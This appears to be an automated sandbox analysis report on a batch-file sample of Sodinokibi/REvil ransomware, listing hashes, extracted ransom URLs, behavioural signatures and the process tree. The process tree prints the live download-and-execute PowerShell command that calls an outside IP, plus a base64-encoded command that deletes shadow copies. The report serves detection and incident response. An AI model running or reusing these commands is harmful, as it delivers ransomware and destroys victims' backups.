Analysis
-
max time kernel
145s -
max time network
147s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
15-08-2020 23:10
Static task
static1
Behavioral task
behavioral1
Sample
235620e528e879523640f19c8cb5ee8e.bat
Resource
win7v200722
Behavioral task
behavioral2
Sample
235620e528e879523640f19c8cb5ee8e.bat
Resource
win10v200722
General
-
Target
235620e528e879523640f19c8cb5ee8e.bat
-
Size
219B
-
MD5
3141305118100484c56608118b0125cd
-
SHA1
6130755f363b7419592d3f30e74854847acbde07
-
SHA256
14e3d246bf04730f371e94114788e30bb4a609324dd115e56411f6a5066b8ea1
-
SHA512
f81b732613a643ff65706bc9d3c06fdbd2bdd804661e7899c43f11298145a20a1bfd58c48067e0e218eb789c667ae2c62c278094c89599cd74687a01f758295f
Malware Config
Extracted
http://185.103.242.78/pastes/235620e528e879523640f19c8cb5ee8e
Extracted
C:\huj40pji59-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/E4C4D3882405CF52
http://decryptor.cc/E4C4D3882405CF52
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Blacklisted process makes network request 57 IoCs
Processes:
powershell.exeflow pid process 1 576 powershell.exe 3 576 powershell.exe 5 576 powershell.exe 9 576 powershell.exe 11 576 powershell.exe 16 576 powershell.exe 18 576 powershell.exe 20 576 powershell.exe 22 576 powershell.exe 30 576 powershell.exe 32 576 powershell.exe 34 576 powershell.exe 36 576 powershell.exe 38 576 powershell.exe 41 576 powershell.exe 43 576 powershell.exe 46 576 powershell.exe 48 576 powershell.exe 50 576 powershell.exe 52 576 powershell.exe 54 576 powershell.exe 56 576 powershell.exe 58 576 powershell.exe 60 576 powershell.exe 62 576 powershell.exe 64 576 powershell.exe 66 576 powershell.exe 67 576 powershell.exe 69 576 powershell.exe 71 576 powershell.exe 73 576 powershell.exe 75 576 powershell.exe 77 576 powershell.exe 79 576 powershell.exe 81 576 powershell.exe 83 576 powershell.exe 85 576 powershell.exe 87 576 powershell.exe 89 576 powershell.exe 91 576 powershell.exe 93 576 powershell.exe 95 576 powershell.exe 97 576 powershell.exe 99 576 powershell.exe 101 576 powershell.exe 103 576 powershell.exe 105 576 powershell.exe 107 576 powershell.exe 109 576 powershell.exe 111 576 powershell.exe 113 576 powershell.exe 115 576 powershell.exe 117 576 powershell.exe 119 576 powershell.exe 121 576 powershell.exe 123 576 powershell.exe 126 576 powershell.exe -
Modifies extensions of user files 2 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
powershell.exedescription ioc process File renamed C:\Users\Admin\Pictures\NewGrant.raw => \??\c:\users\admin\pictures\NewGrant.raw.huj40pji59 powershell.exe File renamed C:\Users\Admin\Pictures\OutSend.raw => \??\c:\users\admin\pictures\OutSend.raw.huj40pji59 powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2168186643-810464528-1121082739-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\3emo6z2jao0f1.bmp" powershell.exe -
Drops file in Program Files directory 16 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\CompareExit.xltx powershell.exe File opened for modification \??\c:\program files\PublishFind.xml powershell.exe File created \??\c:\program files (x86)\huj40pji59-readme.txt powershell.exe File opened for modification \??\c:\program files\OutWatch.wav powershell.exe File opened for modification \??\c:\program files\ResizeSelect.png powershell.exe File opened for modification \??\c:\program files\RevokeImport.wma powershell.exe File opened for modification \??\c:\program files\UseMove.jfif powershell.exe File opened for modification \??\c:\program files\ConvertFromLimit.WTV powershell.exe File opened for modification \??\c:\program files\SubmitStart.ADT powershell.exe File opened for modification \??\c:\program files\ClearUnblock.rm powershell.exe File opened for modification \??\c:\program files\MeasureGrant.mht powershell.exe File opened for modification \??\c:\program files\ProtectStart.xml powershell.exe File opened for modification \??\c:\program files\RedoBlock.html powershell.exe File opened for modification \??\c:\program files\RestartInstall.rle powershell.exe File opened for modification \??\c:\program files\SearchTrace.js powershell.exe File created \??\c:\program files\huj40pji59-readme.txt powershell.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exepid process 576 powershell.exe 576 powershell.exe 576 powershell.exe 576 powershell.exe 576 powershell.exe 1364 powershell.exe 1364 powershell.exe 1364 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 576 powershell.exe Token: SeDebugPrivilege 576 powershell.exe Token: SeDebugPrivilege 1364 powershell.exe Token: SeBackupPrivilege 2764 vssvc.exe Token: SeRestorePrivilege 2764 vssvc.exe Token: SeAuditPrivilege 2764 vssvc.exe Token: SeTakeOwnershipPrivilege 576 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 2608 wrote to memory of 576 2608 cmd.exe powershell.exe PID 2608 wrote to memory of 576 2608 cmd.exe powershell.exe PID 2608 wrote to memory of 576 2608 cmd.exe powershell.exe PID 576 wrote to memory of 1364 576 powershell.exe powershell.exe PID 576 wrote to memory of 1364 576 powershell.exe powershell.exe PID 576 wrote to memory of 1364 576 powershell.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\235620e528e879523640f19c8cb5ee8e.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2608 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/235620e528e879523640f19c8cb5ee8e');Invoke-YXVVCLYNAQLV;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:576 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1364
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:2764